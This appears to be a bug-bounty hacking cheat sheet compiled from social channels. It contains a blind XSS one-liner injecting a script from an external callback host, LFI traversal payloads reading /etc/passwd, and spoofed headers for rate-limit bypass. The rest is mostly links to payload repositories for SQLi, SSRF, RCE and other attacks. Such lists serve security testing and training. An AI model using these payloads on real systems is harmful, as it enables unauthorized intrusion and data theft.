One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters

IDOR Checklist !

Testing Authentication Flaws in Web Application

Some filter bypass payload list while hunting for LFi vulnerability


→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd

LFI Parameters

Remote File Inclusion (RFI)

Rate limit bypass using some custom headers:

X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP

403 bypass techniques

Bypassing Rate Limit Protection

Github Dorks Cheatsheet

Find files with sensitive info, API Keys, Tokens and Passwords.

+ list of github dorks automation tools

Chrome has just unleashed popovers: modal dialogs without JS! Of course you can abuse them for XSS filter evasion

SSRF Techniques Roadmap

WhatsApp'ta Cyber Security kanalını takip edin: https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q

HTTP Host Header Attack
https://www.saygili.org/2020/11/http-host-header-attack.html

Cross-Site Request Forgery
https://www.saygili.org/2020/11/cross-site-request-forgery.html

GitHub - rodolfomarianocy/OSCP-Tricks-2023: OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercises, Machines
https://github.com/rodolfomarianocy/OSCP-Tricks-2023

Bug bounty Cheatsheet:

For more like this, join us at:
t.me/OSCP_training

XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list

SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md

SSRF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

CRLF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection

CSV-Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection

Command Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

Directory Traversal
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal

LFI
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

XXE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md

Open-Redirect
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md

RCE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md

Crypto
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md

Template Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

XSLT
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md

Content Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md

LDAP Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection

NoSQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection

CSRF Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection

GraphQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection

IDOR
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References

ISCM
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management

LaTex Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection

OAuth
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth

XPATH Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection

Bypass Upload Tricky
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files